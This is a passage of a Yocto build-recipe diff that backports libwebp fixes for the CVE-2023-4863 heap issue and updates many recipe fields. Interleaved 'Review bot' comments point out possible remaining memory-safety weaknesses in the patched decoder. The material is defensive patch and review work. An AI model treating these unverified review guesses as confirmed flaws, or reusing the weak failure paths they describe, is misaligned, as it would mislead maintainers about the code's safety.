++ BuildHuffmanTable(NULL, root_bits, code_lengths, code_lengths_size, NULL);
+ assert(code_lengths_size <= MAX_CODE_LENGTHS_SIZE);
+- if (root_table == NULL) {
+- total_size = BuildHuffmanTable(NULL, root_bits,
+- code_lengths, code_lengths_size, NULL);
+- } else if (code_lengths_size <= SORTED_SIZE_CUTOFF) {
++ if (total_size == 0 || root_table == NULL) return total_size;
++
++ if (root_table->curr_segment->curr_table + total_size >=
++ root_table->curr_segment->start + root_table->curr_segment->size) {
++ // If 'root_table' does not have enough memory, allocate a new segment.
++ // The available part of root_table->curr_segment is left unused because we
++ // need a contiguous buffer.
++ const int segment_size = root_table->curr_segment->size;
++ struct HuffmanTablesSegment* next =
++ (HuffmanTablesSegment*)WebPSafeMalloc(1, sizeof(*next));
++ if (next == NULL) return 0;
++ // Fill the new segment.
++ // We need at least 'total_size' but if that value is small, it is better to
++ // allocate a big chunk to prevent more allocations later. 'segment_size' is
++ // therefore chosen (any other arbitrary value could be chosen).
++ next->size = total_size > segment_size ? total_size : segment_size;
++ next->start =
++ (HuffmanCode*)WebPSafeMalloc(next->size, sizeof(*next->start));
++ if (next->start == NULL) {
++ WebPSafeFree(next);
++ return 0;
++ }
++ next->curr_table = next->start;
++ next->next = NULL;
++ // Point to the new segment.
++ root_table->curr_segment->next = next;
++ root_table->curr_segment = next;
++ }
++ if (code_lengths_size <= SORTED_SIZE_CUTOFF) {
+ // use local stack-allocated array.
+ uint16_t sorted[SORTED_SIZE_CUTOFF];
+- total_size = BuildHuffmanTable(root_table, root_bits,
+- code_lengths, code_lengths_size, sorted);
+- } else { // rare case. Use heap allocation.
++ BuildHuffmanTable(root_table->curr_segment->curr_table, root_bits,
++ code_lengths, code_lengths_size, sorted);
++ } else { // rare case. Use heap allocation.
+ uint16_t* const sorted =
+ (uint16_t*)WebPSafeMalloc(code_lengths_size, sizeof(*sorted));
+ if (sorted == NULL) return 0;
+- total_size = BuildHuffmanTable(root_table, root_bits,
+- code_lengths, code_lengths_size, sorted);
++ BuildHuffmanTable(root_table->curr_segment->curr_table, root_bits,
++ code_lengths, code_lengths_size, sorted);
+ WebPSafeFree(sorted);
+ }
+ return total_size;
+ }
++
++int VP8LHuffmanTablesAllocate(int size, HuffmanTables* huffman_tables) {
++ // Have 'segment' point to the first segment for now, 'root'.
++ HuffmanTablesSegment* const root = &huffman_tables->root;
++ huffman_tables->curr_segment = root;
++ // Allocate root.
++ root->start = (HuffmanCode*)WebPSafeMalloc(size, sizeof(*root->start));
++ if (root->start == NULL) return 0;
++ root->curr_table = root->start;
++ root->next = NULL;
++ root->size = size;
++ return 1;
++}
++
++void VP8LHuffmanTablesDeallocate(HuffmanTables* const huffman_tables) {
++ HuffmanTablesSegment *current, *next;
++ if (huffman_tables == NULL) return;
++ // Free the root node.
++ current = &huffman_tables->root;
++ next = current->next;
++ WebPSafeFree(current->start);
++ current->start = NULL;
++ current->next = NULL;
++ current = next;
++ // Free the following nodes.
++ while (current != NULL) {
++ next = current->next;
++ WebPSafeFree(current->start);
++ WebPSafeFree(current);
++ current = next;
++ }
++}
+diff --git a/src/utils/huffman_utils.h b/src/utils/huffman_utils.h
+index 13b7ad1..98415c5 100644
+--- a/src/utils/huffman_utils.h
++++ b/src/utils/huffman_utils.h
+@@ -43,6 +43,29 @@ typedef struct {
+ // or non-literal symbol otherwise
+ } HuffmanCode32;
+
++// Contiguous memory segment of HuffmanCodes.
++typedef struct HuffmanTablesSegment {
++ HuffmanCode* start;
++ // Pointer to where we are writing into the segment. Starts at 'start' and
++ // cannot go beyond 'start' + 'size'.
++ HuffmanCode* curr_table;
++ // Pointer to the next segment in the chain.
++ struct HuffmanTablesSegment* next;
++ int size;
++} HuffmanTablesSegment;
++
++// Chained memory segments of HuffmanCodes.
++typedef struct HuffmanTables {
++ HuffmanTablesSegment root;
++ // Currently processed segment. At first, this is 'root'.
++ HuffmanTablesSegment* curr_segment;
++} HuffmanTables;
++
++// Allocates a HuffmanTables with 'size' contiguous HuffmanCodes. Returns 0 on
++// memory allocation error, 1 otherwise.
++int VP8LHuffmanTablesAllocate(int size, HuffmanTables* huffman_tables);
++void VP8LHuffmanTablesDeallocate(HuffmanTables* const huffman_tables);
++
+ #define HUFFMAN_PACKED_BITS 6
+ #define HUFFMAN_PACKED_TABLE_SIZE (1u << HUFFMAN_PACKED_BITS)
+
+@@ -78,9 +101,7 @@ void VP8LHtreeGroupsFree(HTreeGroup* const htree_groups);
+ // the huffman table.
+ // Returns built table size or 0 in case of error (invalid tree or
+ // memory error).
+-// If root_table is NULL, it returns 0 if a lookup cannot be built, something
+-// > 0 otherwise (but not the table size).
+-int VP8LBuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
++int VP8LBuildHuffmanTable(HuffmanTables* const root_table, int root_bits,
+ const int code_lengths[], int code_lengths_size);
+
+ #ifdef __cplusplus
+--
+2.40.0
+
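Review bot: `VP8LHuffmanTablesAllocate()` returns 0 on a failed `WebPSafeMalloc` before it has set `root->next`, and `ReadHuffmanCodeLengths()` then jumps to `End:` and calls `VP8LHuffmanTablesDeallocate(&tables)` on the stack variable `HuffmanTables tables;`, which was never zeroed. The deallocator reads `current->next` from that uninitialised struct and would follow and free whatever pointer value it finds there. Moving `root->next = NULL;` above the allocation in `VP8LHuffmanTablesAllocate()` makes this failure path safe. If `ReadHuffmanCodeLengths()` can reach `End:` before the allocate call (not visible in the hunk), `tables` would also need to be zero-initialised at its declaration.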
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch
new file mode 100644
index 0000000000..c1eedb6100
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch
@@ -0,0 +1,53 @@
+From 95ea5226c870449522240ccff26f0b006037c520 Mon Sep 17 00:00:00 2001
+From: Vincent Rabaud <vrabaud@google.com>
+Date: Mon, 11 Sep 2023 16:06:08 +0200
+Subject: [PATCH 2/2] Fix invalid incremental decoding check.
+
+The first condition is only necessary if we have not read enough
+(enough being defined by src_last, not src_end which is the end
+of the image).
+The second condition now fits the comment below: "if not
+incremental, and we are past the end of buffer".
+
+BUG=oss-fuzz:62136
+
+Change-Id: I0700f67c62db8e1c02c2e429a069a71e606a5e4f
+
+CVE: CVE-2023-4863
+
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/95ea5226c870449522240ccff26f0b006037c520]
+
+Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com>
+---
+ src/dec/vp8l_dec.c | 15 +++++++++++++--
+ 1 file changed, 13 insertions(+), 2 deletions(-)
+
+diff --git a/src/dec/vp8l_dec.c b/src/dec/vp8l_dec.c
+index 0d38314..684a5b6 100644
+--- a/src/dec/vp8l_dec.c
++++ b/src/dec/vp8l_dec.c
+@@ -1237,9 +1237,20 @@ static int DecodeImageData(VP8LDecoder* const dec, uint32_t* const data,
+ }
+
+ br->eos_ = VP8LIsEndOfStream(br);
+- if (dec->incremental_ && br->eos_ && src < src_end) {
++ // In incremental decoding:
++ // br->eos_ && src < src_last: if 'br' reached the end of the buffer and
++ // 'src_last' has not been reached yet, there is not enough data. 'dec' has to
++ // be reset until there is more data.
++ // !br->eos_ && src < src_last: this cannot happen as either the buffer is
++ // fully read, either enough has been read to reach 'src_last'.
++ // src >= src_last: 'src_last' is reached, all is fine. 'src' can actually go
++ // beyond 'src_last' in case the image is cropped and an LZ77 goes further.
++ // The buffer might have been enough or there is some left. 'br->eos_' does
++ // not matter.
++ assert(!dec->incremental_ || (br->eos_ && src < src_last) || src >= src_last);
++ if (dec->incremental_ && br->eos_ && src < src_last) {
+ RestoreState(dec);
+- } else if (!br->eos_) {
++ } else if ((dec->incremental_ && src >= src_last) || !br->eos_) {
+ // Process the remaining rows corresponding to last row-block.
+ if (process_func != NULL) {
+ process_func(dec, row > last_row ? last_row : row);
+--
+2.40.0
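Review bot: The state the new comment calls impossible (`!br->eos_ && src < src_last` during incremental decoding) is guarded only by `assert()`, which is compiled out when NDEBUG is defined. In such a build that state falls into the `else if (... || !br->eos_)` branch and rows are processed as if decoding had progressed normally. If the invariant matters for memory safety, an explicit runtime check that fails the decode would be more robust than the assert. Whether the state is reachable cannot be judged from this hunk, because DecodeImageData starts and ends outside it.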
diff --git a/meta/recipes-multimedia/webp/libwebp_1.1.0.bb b/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
index 68e5ae2b3c..88c36cb76c 100644
--- a/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
+++ b/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
@@ -19,6 +19,12 @@ SRC_URI[sha256sum] = "98a052268cc4d5ece27f76572a7f50293f439c17a98e67c4ea0c7ed6f5
UPSTREAM_CHECK_URI = "http://downloads.webmproject.org/releases/webp/index.html"
+SRC_URI += " \
+ file://CVE-2023-1999.patch \
+ file://CVE-2023-4863-0001.patch \
+ file://CVE-2023-4863-0002.patch \
+"
+
EXTRA_OECONF = " \
--disable-wic \
--enable-libwebpmux \
diff --git a/meta/recipes-multimedia/x264/x264_git.bb b/meta/recipes-multimedia/x264/x264_git.bb
index 39429a8809..6789646833 100644
--- a/meta/recipes-multimedia/x264/x264_git.bb
+++ b/meta/recipes-multimedia/x264/x264_git.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
DEPENDS = "nasm-native"
-SRC_URI = "git://github.com/mirror/x264;branch=stable \
+SRC_URI = "git://github.com/mirror/x264;branch=stable;protocol=https \
file://don-t-default-to-cortex-a9-with-neon.patch \
file://Fix-X32-build-by-disabling-asm.patch \
"
diff --git a/meta/recipes-rt/rt-tests/rt-tests.inc b/meta/recipes-rt/rt-tests/rt-tests.inc
index 3ac39d90c3..29ebe2d361 100644
--- a/meta/recipes-rt/rt-tests/rt-tests.inc
+++ b/meta/recipes-rt/rt-tests/rt-tests.inc
@@ -2,7 +2,7 @@
SRCREV = "dff174f994f547a5785d32454865f140daacb0f5"
PE = "1"
-SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git"
+SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git;branch=main"
# 1.2 to 1.5 seem to be development versions
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>(?!1\.[2-6])(\d+(\.\d+)+))"
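Review bot: The updated `SRC_URI` still fetches over the unauthenticated `git://` transport, whereas the x264 recipe changed alongside it gained `;protocol=https`. The pinned `SRCREV` limits what a tampered fetch could deliver, but adding the parameter here too, as in `git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git;branch=main;protocol=https`, would give transport integrity and also work on networks that block the git port.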
diff --git a/meta/recipes-rt/rt-tests/rt-tests_1.1.bb b/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
index dad252b4ed..1db86b5067 100644
--- a/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
+++ b/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Real-Time preemption testcases"
-HOMEPAGE = "https://rt.wiki.kernel.org/index.php/Cyclictest"
+HOMEPAGE = "https://wiki.linuxfoundation.org/realtime/documentation/start"
+DESCRIPTION = "The main aim of the PREEMPT_RT patch is to minimize the amount of kernel code that is non-preemptible Therefore several substitution mechanisms and new mechanisms are implemented."
SECTION = "tests"
DEPENDS = "linux-libc-headers virtual/libc"
LICENSE = "GPLv2 & GPLv2+"
diff --git a/meta/recipes-sato/images/core-image-sato-dev.bb b/meta/recipes-sato/images/core-image-sato-dev.bb
index 7fa69d0997..f45a83273c 100644
--- a/meta/recipes-sato/images/core-image-sato-dev.bb
+++ b/meta/recipes-sato/images/core-image-sato-dev.bb
@@ -3,5 +3,6 @@ require core-image-sato.bb
DESCRIPTION = "Image with Sato for development work. It includes everything \
within core-image-sato plus a native toolchain, application development and \
testing libraries, profiling and debug symbols."
+HOMEPAGE = "https://www.yoctoproject.org/"
IMAGE_FEATURES += "dev-pkgs"
diff --git a/meta/recipes-sato/images/core-image-sato-ptest-fast.bb b/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
index 3641217306..d37ad00cf8 100644
--- a/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
+++ b/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
@@ -1,9 +1,13 @@
+inherit features_check
+REQUIRED_DISTRO_FEATURES = "ptest"
+
require core-image-sato-sdk.bb
require conf/distro/include/ptest-packagelists.inc
IMAGE_INSTALL += "${PTESTS_FAST}"
DESCRIPTION += "Also includes ptest packages with fast execution times to allow for more automated QA."
+HOMEPAGE = "https://www.yoctoproject.org/"
# This image is sufficiently large (~1.8GB) that it can't actually fit in a live
# image (which has a 4GB limit), so nullify the overhead factor (1.3x out of the
diff --git a/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb b/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
index bf749acd79..eea89a5d6c 100644
--- a/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
+++ b/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
@@ -1,7 +1,11 @@
+inherit features_check
+REQUIRED_DISTRO_FEATURES = "ptest"
+
require core-image-sato-sdk.bb
require conf/distro/include/ptest-packagelists.inc
DESCRIPTION += "Also includes ptest packages."
+HOMEPAGE = "https://www.yoctoproject.org/"
PROVIDES += "core-image-sato-ptest"
diff --git a/meta/recipes-sato/images/core-image-sato-sdk.bb b/meta/recipes-sato/images/core-image-sato-sdk.bb
index d7cc52b52b..b52de0def0 100644
--- a/meta/recipes-sato/images/core-image-sato-sdk.bb
+++ b/meta/recipes-sato/images/core-image-sato-sdk.bb
@@ -3,6 +3,7 @@ require core-image-sato.bb
DESCRIPTION = "Image with Sato support that includes everything within \
core-image-sato plus meta-toolchain, development headers and libraries to \
form a standalone SDK."
+HOMEPAGE = "https://www.yoctoproject.org/"
IMAGE_FEATURES += "dev-pkgs tools-sdk \
tools-debug eclipse-debug tools-profile tools-testapps debug-tweaks ssh-server-openssh"
diff --git a/meta/recipes-sato/images/core-image-sato.bb b/meta/recipes-sato/images/core-image-sato.bb
index 673106eb6d..300d8e0d43 100644
--- a/meta/recipes-sato/images/core-image-sato.bb
+++ b/meta/recipes-sato/images/core-image-sato.bb
@@ -1,6 +1,7 @@
DESCRIPTION = "Image with Sato, a mobile environment and visual style for \
mobile devices. The image supports X11 with a Sato theme, Pimlico \
applications, and contains terminal, editor, and file manager."
+HOMEPAGE = "https://www.yoctoproject.org/"
IMAGE_FEATURES += "splash package-management x11-base x11-sato ssh-server-dropbear hwcodecs"
@@ -12,4 +13,5 @@ TOOLCHAIN_HOST_TASK_append = " nativesdk-intltool nativesdk-glib-2.0"
TOOLCHAIN_HOST_TASK_remove_task-populate-sdk-ext = " nativesdk-intltool nativesdk-glib-2.0"
QB_MEM = '${@bb.utils.contains("DISTRO_FEATURES", "opengl", "-m 512", "-m 256", d)}'
+QB_MEM_qemuarmv5 = "-m 256"
QB_MEM_qemumips = "-m 256"
diff --git a/meta/recipes-sato/l3afpad/l3afpad_git.bb b/meta/recipes-sato/l3afpad/l3afpad_git.bb
index 6fdcc3e392..4d5d299d47 100644
--- a/meta/recipes-sato/l3afpad/l3afpad_git.bb
+++ b/meta/recipes-sato/l3afpad/l3afpad_git.bb
@@ -1,4 +1,8 @@
SUMMARY = "Simple GTK+ Text Editor"
+DESCRIPTION = "L3afpad is a simple GTK+ text editor that emphasizes simplicity. As development \
+focuses on keeping weight down to a minimum, only the most essential features \
+are implemented in the editor. L3afpad is simple to use, is easily compiled, \
+requires few libraries, and starts up quickly."
HOMEPAGE = "https://github.com/stevenhoneyman/l3afpad"
# Note that COPYING seems to mistakenly contain LGPLv2.1.
@@ -12,7 +16,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \
DEPENDS = "gtk+3 intltool-native gettext-native"
PV = "0.8.18.1.11+git${SRCPV}"
-SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git"
+SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git;branch=master;protocol=https"
SRCREV ="3cdccdc9505643e50f8208171d9eee5de11a42ff"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb b/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
index 547e851c15..5733a36b12 100644
--- a/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
+++ b/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
@@ -11,7 +11,7 @@ RDEPENDS_${PN} = "settings-daemon"
# SRCREV tagged 0.2
SRCREV = "ef2192ce98d9374ffdad5f78544c3f8f353c16aa"
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
file://no-handed.patch"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
diff --git a/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb b/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
index 5c23e85202..2a2eb24f57 100644
--- a/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
+++ b/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
@@ -1,4 +1,5 @@
SUMMARY = "Matchbox Window Manager Desktop"
+DESCRIPTION = "A lightweight windows manager for embedded systems. It uses the desktop background to provide an application launcher and allows modules to be loaded for additional functionality."
HOMEPAGE = "http://matchbox-project.org/"
BUGTRACKER = "http://bugzilla.yoctoproject.org/"
@@ -12,7 +13,7 @@ SECTION = "x11/wm"
# SRCREV tagged 2.2
SRCREV = "6bc67d09da4147e5552fe30011a05a2c59d2f777"
-SRC_URI = "git://git.yoctoproject.org/${BPN}-2 \
+SRC_URI = "git://git.yoctoproject.org/${BPN}-2;branch=master \
file://vfolders/* \
"
diff --git a/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb b/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
index dfc7fbad57..49e37bd77c 100644
--- a/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
+++ b/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Matchbox virtual keyboard for X11"
+DESCRIPTION = "An on screen 'virtual' or 'software' keyboard."
HOMEPAGE = "http://matchbox-project.org"
BUGTRACKER = "http://bugzilla.yoctoproject.org/"
SECTION = "x11"
diff --git a/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb b/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
index 2e6f5b7085..54fe578cd3 100644
--- a/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
+++ b/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
@@ -1,4 +1,6 @@
SUMMARY = "Simple GTK+ based panel for handheld devices"
+DESCRIPTION = "A flexible always present 'window bar' for holding application \
+launchers and small 'applet' style applications"
HOMEPAGE = "http://matchbox-project.org"
BUGTRACKER = "http://bugzilla.yoctoproject.org/"
@@ -21,7 +23,7 @@ RPROVIDES_${PN} = "matchbox-panel"
RREPLACES_${PN} = "matchbox-panel"
RCONFLICTS_${PN} = "matchbox-panel"
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
file://0001-applets-systray-Allow-icons-to-be-smaller.patch \
"
diff --git a/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb b/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
index 9f00281dde..e2e81c2905 100644
--- a/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
+++ b/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
@@ -11,7 +11,7 @@ SECTION = "x11/utils"
#SRCREV tagged 0.2
SRCREV = "161276d0f5d1be8187010fd0d9581a6feca70ea5"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb b/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
index 7a043d3447..bc4024736f 100644
--- a/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
+++ b/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
@@ -2,7 +2,7 @@ require matchbox-theme-sato.inc
# SRCREV tagged 0.2
SRCREV = "df085ba9cdaeaf2956890b0e29d7ea1779bf6c78"
-SRC_URI = "git://git.yoctoproject.org/matchbox-sato"
+SRC_URI = "git://git.yoctoproject.org/matchbox-sato;branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb b/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
index ed3f1a69a1..25725e078d 100644
--- a/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
+++ b/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
@@ -3,6 +3,8 @@
#
SUMMARY = "Sato desktop"
+DESCRIPTION = "Packagegroups provide a convenient mechanism of bundling a collection of packages."
+HOMEPAGE = "https://www.yoctoproject.org/"
PR = "r33"
PACKAGE_ARCH = "${MACHINE_ARCH}"
diff --git a/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb b/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
index 7885e0abae..153fbeb0b7 100644
--- a/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
+++ b/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Fast lightweight tabbed filemanager"
+DESCRIPTION = "A free file manager application and the standard file manager of LXDE."
HOMEPAGE = "http://pcmanfm.sourceforge.net/"
LICENSE = "GPLv2 & GPLv2+ & LGPLv2.1+"
diff --git a/meta/recipes-sato/puzzles/puzzles_git.bb b/meta/recipes-sato/puzzles/puzzles_git.bb
index 41b78d6fe1..3ee441998d 100644
--- a/meta/recipes-sato/puzzles/puzzles_git.bb
+++ b/meta/recipes-sato/puzzles/puzzles_git.bb
@@ -1,4 +1,5 @@
SUMMARY = "Simon Tatham's Portable Puzzle Collection"
+DESCRIPTION = "Collection of small computer programs which implement one-player puzzle games."
HOMEPAGE = "http://www.chiark.greenend.org.uk/~sgtatham/puzzles/"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENCE;md5=6099f4981f9461d7f411091e69a7f07a"
@@ -8,7 +9,7 @@ DEPENDS = "libxt"
# The libxt requires x11 in DISTRO_FEATURES
REQUIRED_DISTRO_FEATURES = "x11"
-SRC_URI = "git://git.tartarus.org/simon/puzzles.git \
+SRC_URI = "git://git.tartarus.org/simon/puzzles.git;branch=main \
file://fix-compiling-failure-with-option-g-O.patch \
file://0001-palisade-Fix-warnings-with-clang-on-arm.patch \
file://0001-Use-Wno-error-format-overflow-if-the-compiler-suppor.patch \
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc b/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
index b568f04580..0e5bcbe480 100644
--- a/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
@@ -5,6 +5,7 @@ terminal emulator rxvt, modified to store text in Unicode \
(either UCS-2 or UCS-4) and to use locale-correct input and \
output. It also supports mixing multiple fonts at the \
same time, including Xft fonts."
+HOMEPAGE = "https://rxvt.org/"
DEPENDS = "virtual/libx11 libxt libxft gdk-pixbuf libxmu"
SRC_URI = "http://dist.schmorp.de/rxvt-unicode/Attic/rxvt-unicode-${PV}.tar.bz2 \
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch b/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch
new file mode 100644
index 0000000000..f10dca09d6
--- /dev/null
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch
@@ -0,0 +1,30 @@
+From 9a8f1d73e7b7e183768a8379ef32429a84f0e5c2 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 26 Feb 2021 18:11:56 -0800
+Subject: [PATCH] libev: remove deprecated throw specification
+
+removes the throw specifications that are deprecated since C++11:
+warning: dynamic exception specifications are deprecated in C++11 [-Wdeprecated]
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ libev/ev++.h | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/libev/ev++.h b/libev/ev++.h
+index 4f0a36a..85ddf44 100644
+--- a/libev/ev++.h
++++ b/libev/ev++.h
+@@ -376,7 +376,7 @@ namespace ev {
+
+ struct default_loop : loop_ref
+ {
+- default_loop (unsigned int flags = AUTO) throw (bad_loop)
++ default_loop (unsigned int flags = AUTO)
+ #if EV_MULTIPLICITY
+ : loop_ref (ev_default_loop (flags))
+ #endif
+--
+2.30.1
+
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb b/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
index bfa8a614df..283e8d7751 100644
--- a/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
@@ -4,5 +4,7 @@ LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
file://src/main.C;beginline=1;endline=31;md5=d3600d7ee1062667fcd1193fbe6485f6"
-SRC_URI[md5sum] = "93782dec27494eb079467dacf6e48185"
+SRC_URI += "file://0001-libev-remove-deprecated-throw-specification.patch"
+
SRC_URI[sha256sum] = "e94628e9bcfa0adb1115d83649f898d6edb4baced44f5d5b769c2eeb8b95addd"
+
diff --git a/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb b/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
index 2b1f513f1c..7e7612253d 100644
--- a/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
+++ b/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
@@ -11,7 +11,7 @@ DEPENDS = "matchbox-panel-2 gtk+3"
# SRCREV tagged 0.3
SRCREV = "9250fa5a012d84ff45984e8c4345ee7635227756"
-SRC_URI = "git://git.yoctoproject.org/screenshot"
+SRC_URI = "git://git.yoctoproject.org/screenshot;branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb b/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
index d01177f9b9..19c4a73dc3 100644
--- a/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
+++ b/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
@@ -9,7 +9,7 @@ SECTION = "x11"
# SRCREV tagged 0.0.2
SRCREV = "b2e5da502f8c5ff75e9e6da771372ef8e40fd9a2"
-SRC_URI = "git://git.yoctoproject.org/xsettings-daemon \
+SRC_URI = "git://git.yoctoproject.org/xsettings-daemon;branch=master \
file://addsoundkeys.patch \
file://70settings-daemon.sh \
"
diff --git a/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch b/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch
new file mode 100644
index 0000000000..528dec8c8b
--- /dev/null
+++ b/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch
@@ -0,0 +1,31 @@
+From dcf9ae0dc0b4510eddbeeea09e11edfb123f95af Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Sun, 2 May 2021 13:10:49 -0700
+Subject: [PATCH] MiniBrowser: Fix reproduciblity
+
+Do not emit references to source dir in generated sourcecode
+
+Upstream-Status: Submitted [https://bugs.webkit.org/show_bug.cgi?id=225283]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ Tools/MiniBrowser/gtk/CMakeLists.txt | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Tools/MiniBrowser/gtk/CMakeLists.txt b/Tools/MiniBrowser/gtk/CMakeLists.txt
+index 93b62521..482d3b00 100644
+--- a/Tools/MiniBrowser/gtk/CMakeLists.txt
++++ b/Tools/MiniBrowser/gtk/CMakeLists.txt
+@@ -48,8 +48,8 @@ add_custom_command(
+ OUTPUT ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
+ ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
+ MAIN_DEPENDENCY ${MINIBROWSER_DIR}/browser-marshal.list
+- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
